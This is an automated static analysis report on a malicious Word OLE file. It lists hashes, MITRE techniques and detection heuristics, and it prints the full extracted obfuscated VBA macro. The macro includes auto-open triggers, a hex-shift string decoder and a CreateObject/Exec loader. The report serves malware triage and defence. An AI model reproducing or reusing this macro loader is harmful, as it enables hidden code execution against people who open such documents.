Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fdcb72b9cb56c2c5…

MALICIOUS

Office (OLE)

Size: 102.0 KB
Created: 2018-04-18 11:12:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 267b56483697a6838fdaeb23ad3b5221
SHA-1: e0fed8465ac9a4a937c19cd72c16e97ffff2b15f
SHA-256: fdcb72b9cb56c2c5de12de8fae4e214372309c3648e9cbf56018e156fa55efba
Risk Score: 344

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer

The file contains heavily obfuscated VBA macros, including an Auto_Open macro, which are designed to execute arbitrary code. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the presence of a custom decoder and calls to CreateObject, Shell, and exec, suggesting the macro's purpose is to download and run a secondary payload. The ClamAV detection 'Xls.Malware.Valyria-6700358-0' further confirms its malicious nature.

Heuristics (10)

  • ClamAV: Xls.Malware.Valyria-6700358-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected (medium, 6 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Sub NJI_L()
        Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
        Dim IDO_AA As String
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Public Sub Document_Open()
        Application.Run ZDX_KGX("859B878E81928592847F8D")
  • Workbook_Open macro (high) OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        Application.Run "ThisWorkbook." & ZDX_KGX("859B878E81928592847F8D")
  • Auto_Open macro (high) OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Sub
    Public Sub Auto_Open()
        Application.Run ZDX_KGX("859B878E81928592847F8D")
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Sub NJI_L()
        Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
        Dim IDO_AA As String
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3327 bytes
SHA-256: b73e37c96fc498c486a5902e30cb6fab51a610ce2ae007840e2f8f5250ce1aba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub NJI_L()
    Dim GB_Z As Object: Set GB_Z = VBA.CreateObject(ZDX_KGX("938F9FAEA5ACB06A8FA4A1A8A8"))
    Dim IDO_AA As String
IDO_AA = "7B5C7B9F7B7B898E7B7A7B4D48AD7B7B8F4D50BA7BABB47B8D7BA27B7B5E4D609254867B5D7B7B877B987B7B724D8442B3BB8A7BA052737BA9494EB97BB6B3A869B07B7B63727BA2767B7B737B7B967C769C97977B7B7B7B51507B957B5E7B75BB7B92907B7D7B7B907B707B7B7B7E685B577B7B7BB74"
Dim B_XO As String
B_XO = "E7B5D7B7B7B467B8E7B887B7B7B557B7B695F467BAF9C45537B3E7B7B4A7B7E8B5B5B99AF7BB17B9590577B987B417B7BB97BAD6C7B817B7BB47B7B7BB37B4B7B6E7BB37B7B7B7B70935A805E7B7B7B827B93B9A54DADAE7B7B547B61A77B7BB347495C7B7B7B7B7B7B3C9B4B7B7B7D7B5C487B7B7B7B"
Dim IR_PM As String
IR_PM = "7B7B4CB67B4A7B7D7B863DAC7B747BBB7B507B7B7BB97B7B7B7BAD7B7B6D627B7BABAC7B7B7B7B8889504A5C7B44637B7B54B97B7B6EB27B7B66B67B68547BAA7B9E7B7B7B638C7B7BA47BA2687B856B7B557B7B7B79787B567B5C7B5D7B70A39A7BB17B7B927B49737B7B8B6C916F7B6D7B58607BA6B"
Dim XMX_VE As String
XMX_VE = "19F6C7BA6A8927B7B7B7BA37B8E997BB1AF8C419EAF7BAE7B7B3E7B7B5F7B45634F7B8F7B7B987B7B7B7B7BAA7BB57B7B7B8EA14E7B7D98B9AC8FAA3CB47BB47BB99B467B7B537BB4B47B7F7B5D7B5F534AB87B7B3C3E4E7B8B7B7D5A7B777B967B7BBBAA697B7B7B7B6C7B7B977B6C927B7B7B7BB9B8"
Dim LP_K As String
LP_K = "997B7B9566B5967B7BB8807B7B7B7B7BB9905B7BA37B50627B464D7B7B7B7B4AB15EB2BA7BAB597B467B7BB47B817B7B4CBA7B7B7B517B7BA25BA47B7B807B7B7B627B6E9E7B7B3D7F98617B7B68AA557B7B6C7BA29C7B7B7B798C7B7BB0A47B7B7C5A48B77B7B7B7BA07BA28C7B76967BB47B7BB67B5"
Dim QQU_AA As String
QQU_AA = "B7B7BA97B7B887F7B7B7BB37B7658B0943E7B6D7D563E7B7B7B7B96565C945F7B7C44638F5C7B7B7B8A7BA87BB1A24196595A7B9A8F7B7BB67B5F7B9E7B7B8A8F7B7B5089407B7B7B5B7B7EA07B8BBB917B3F75A8B77BAA7B7BA07B7B6B707BA05551B78D7B9177846C7B707B97514B7B9249427B517B"
Dim CL_IKX As String
CL_IKX = "84497B7B67B9657B7B7B6C7B877B7B697BA57B7B777B7B697B907BB85D6A7B8A6D7BA97B7B667B5AB86B857BB97BB47B64AD7B7B607BB791587BA3648B739A7BB07B557BA27B7B7B457B7BAA7B7B7B7B8F7B7B7B667B8D547B987B7B807B7D7B7B7B7B7B997B8E7B7B7B847BA987B17B667BA07BB38A7"
Dim X_P As String
X_P = "B88B8AF3FB67B7B7B866A7E7B7B6F7B7BAF6E84B29086959C5E9E7B7B5872867BB77B8AAC4C417B5F5F596E737B7B7B7B3F577B7B63657B557BBA4475697B7B7BA88E807B659F687B8E6D68626597A77B7B606F6A497B7B947B93A17B7B7B7B62777E967B7B3F7B7B537B7B7B7B7B8B4FAB79457B7B7BA87B7B7B7B7B7BA477427B7B3D7B7B7B917B7B7B5D7B975DA252AF7A7B7B9EAE967B467B5A7B7B846F577B7B7B4589877B"

    GB_Z.Exec (ZDX_KGX(ActiveDocument.Variables("ED3OX").Value))
End Sub
Public Sub Auto_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & ZDX_KGX("859B878E81928592847F8D")
End Sub
Public Function ZDX_KGX(ByVal GB_Z As String)
   Dim MJE_VTP As String
   Dim WM_M As Long
   For WM_M = 1 To Len(GB_Z) Step 2
        MJE_VTP = MJE_VTP & Chr(Asc(Chr("&H" & Mid(GB_Z, WM_M, 2))) - 60)
   Next
   ZDX_KGX = MJE_VTP
End Function
Sub I_KREVIVHCQ()
    NJI_L
End Sub
Public Sub Document_Open()
    Application.Run ZDX_KGX("859B878E81928592847F8D")
End Sub